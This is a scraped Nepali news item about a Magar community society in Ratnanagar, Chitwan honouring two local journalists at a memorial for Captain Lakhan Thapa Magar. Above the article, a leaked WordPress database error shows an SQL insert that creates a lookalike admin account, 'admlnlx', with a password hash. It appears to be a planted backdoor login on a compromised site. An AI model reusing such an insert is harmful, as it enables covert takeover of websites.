WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8gYnpFmny4uCr0uZ9gaIwIfujKbVW.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 15:23:12', '', 'admlnlx', 'admlnlx')
चितवन, फागुन २–
नेपाल इकाई मगर समाज संघ रत्ननगरले दुई युवा पत्रकारलाई सम्मान गरेको छ ।
प्रथम शहिद क्याप्टेन लखन थापा मगरेको १४० औं स्मृतिमा समाजले गरेको लखन थापा मगरको शालिक शिलन्यास, भँयर पूजा र विविध साँस्कृतिक तथा सम्मान कार्यक्रमा नारायणी अनलाईन डटकमका प्रधान सम्पादक तथा इमेज च्यानलका चितवन संवाददाता राजु चौधरी र कान्तिपुर दैनिकका चितवन संवाददाता विमल खतिवडालाई सम्मान गरिएको हो ।
कार्यक्रमका प्रमुख अतिथि रत्ननगर नगरपालिकाका कार्यकारी अधिकृत काशीराम गैरे र समाजका अध्यक्ष रमेश राना मगरले पत्रकारद्धय चौधरी र खतिवडालाई सम्मान पत्रले सम्मान गरेका थिए ।

जिल्लामा रहेर पत्रकारिता मार्फत समाजमा पु¥याएको अतुलनीय योगदानको कदर गर्दै सम्मान गरिएको समाजका अध्यक्ष रमेश राना मगरले जानकारी दिनुभयो । यस्तै सोही अवसरमा समाजका संस्थापक अध्यक्षलाई समेत सम्मान प्रदान गरिएको थियो ।